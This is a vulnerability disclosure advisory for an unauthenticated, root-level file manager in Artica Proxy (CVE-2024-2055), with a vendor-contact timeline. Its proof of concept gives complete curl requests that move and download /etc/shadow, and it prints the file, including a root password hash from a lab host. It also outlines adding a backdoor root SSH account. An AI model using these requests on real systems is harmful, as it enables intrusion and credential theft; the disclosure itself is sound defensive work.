Artica Proxy 4.40 / 4.50 Authentication Bypass / Privilege Escalation Vulnerability

Title: Artica Proxy Unauthenticated File Manager Vulnerability
Advisory ID: KL-001-2024-003
Publication Date: 2024.03.05
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt


1. Vulnerability Details

      Affected Vendor: Artica
      Affected Product: Artica Proxy
      Affected Version: 4.40 and 4.50
      Platform: Debian 10 LTS
      CWE Classification: CWE-288: Authentication Bypass Using an
                          Alternate Path or Channel, CWE-552: Files
                          or Directories Accessible to External
                          Parties
      CVE ID: CVE-2024-2055


2. Vulnerability Description

      The "Rich Filemanager" feature of Artica Proxy provides a
      web-based interface for file management capabilities. When
      the feature is enabled, it does not require authentication by
      default, and runs as the root user.


3. Technical Description

      The Artica Proxy can be installed with a small amount of
      "Features" enabled. Within the administrative web interface,
      additional features can be installed, enabled, and disabled. The
      "Rich Filemanager" feature is disabled by default. Enabling
      this feature will spawn a listener on port 5000/tcp bound to
      0.0.0.0. By default, when this feature is enabled, authentication
      is not required to access the web interface. The "Rich
      Filemanager" runs as the root user. This provides an
      unauthenticated attacker complete access to the file system.

        root@artica:~# ps -efww | grep -i File
        root      1888  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER
        root      1889  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER

      This can be exploited by an attacker to add entries in to
      /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create
      an additional root-level account that has the ability to SSH
      in to the system.


4. Mitigation and Remediation Recommendation

      No response from vendor. Rich Filemanager feature is disabled
      by default. Leave it that way.


5. Credit

      This vulnerability was discovered by Jim Becher of KoreLogic,
      Inc.


6. Disclosure Timeline

      2023.12.18 - KoreLogic requests vulnerability contact and
                   secure communication method from Artica.
      2023.12.18 - Artica Support issues automated ticket #1703011342
                   promising follow-up from a human.
      2024.01.10 - KoreLogic again requests vulnerability contact and
                   secure communication method from Artica.
      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
                   mail.articatech.com with response
                   "Client host rejected: Go Away!"
      2024.01.11 - KoreLogic requests vulnerability contact and
                   secure communication method via
                   https://www.articatech.com/ 'Contact Us' web form.
      2024.01.23 - KoreLogic requests CVE from MITRE.
      2024.01.23 - MITRE issues automated ticket #1591692 promising
                   follow-up from a human.
      2024.02.01 - 30 business days have elapsed since KoreLogic
                   attempted to contact the vendor.
      2024.02.06 - KoreLogic requests update on CVE from MITRE.
      2024.02.15 - KoreLogic requests update on CVE from MITRE.
      2024.02.22 - KoreLogic reaches out to alternate CNA for
                   CVE identifiers.
      2024.02.26 - 45 business days have elapsed since KoreLogic
                   attempted to contact the vendor.
      2024.02.29 - Vulnerability details presented to AHA!
                   (takeonme.org) by proxy.
      2024.03.01 - AHA! issues CVE-2024-2055 to track this
                   vulnerability.
      2024.03.05 - KoreLogic public disclosure.


7. Proof of Concept

      Step 1: Move /etc/shadow to /tmp/shadow
      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' 
-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H 
$'Connection: close' 
$'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'

{"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 
Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}

      Step 2: Download /tmp/shadow
      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H 
$'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H 
$'Cache-Control: no-cache' 
$'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'

root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::
      daemon:*:19507:0:99999:7:::
      bin:*:19507:0:99999:7:::
      sys:*:19507:0:99999:7:::
      sync:*:19507:0:99999:7:::
      games:*:19507:0:99999:7:::
      man:*:19507:0:99999:7:::
      lp:*:19507:0:99999:7:::
      mail:*:19507:0:99999:7:::
      news:*:19507:0:99999:7:::
      uucp:*:19507:0:99999:7:::
      proxy:*:19507:0:99999:7:::
      www-data:*:19507:0:99999:7:::
      backup:*:19507:0:99999:7:::
      list:*:19507:0:99999:7:::
      irc:*:19507:0:99999:7:::
      gnats:*:19507:0:99999:7:::
      nobody:*:19507:0:99999:7:::
      _apt:*:19507:0:99999:7:::
      systemd-timesync:*:19507:0:99999:7:::
      systemd-network:*:19507:0:99999:7:::
      systemd-resolve:*:19507:0:99999:7:::
      messagebus:*:19507:0:99999:7:::
      quagga:*:19507:0:99999:7:::
      apt-mirror:*:19507:0:99999:7:::
      privoxy:*:19507:0:99999:7:::
      ntp:*:19507:0:99999:7:::
      redsocks:!:19507:0:99999:7:::
      prads:*:19507:0:99999:7:::
      freerad:*:19507:0:99999:7:::
      vnstat:*:19507:0:99999:7:::
      stunnel4:!:19507:0:99999:7:::
      sshd:*:19507:0:99999:7:::
      vde2-net:*:19507:0:99999:7:::
      memcache:!:19507:0:99999:7:::
      davfs2:*:19507:0:99999:7:::
      ziproxy:!:19507:0:99999:7:::
      proftpd:!:19507:0:99999:7:::
      ftp:*:19507:0:99999:7:::
      mosquitto:*:19507:0:99999:7:::
      openldap:!:19507:0:99999:7:::
      munin:*:19507:0:99999:7:::
      msmtp:*:19507:0:99999:7:::
      Debian-snmp:!:19507:0:99999:7:::
      opendkim:*:19507:0:99999:7:::
      avahi:*:19507:0:99999:7:::
      glances:*:19507:0:99999:7:::
      ArticaStats:!:19507:0:99999:7:::
      netdata:!:19507:0:99999:7:::
      mysql:!:19507:0:99999:7:::
      postfix:!:19507:0:99999:7:::
      squid:!:19507:0:99999:7:::
      smokeping:!:19507:0:99999:7:::
      unbound:!:19645:0:99999:7:::

      Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition
      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' 
-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H 
$'Connection: close' 
$'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208'

{"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 
Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}


The contents of this advisory are copyright(c) 2024
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/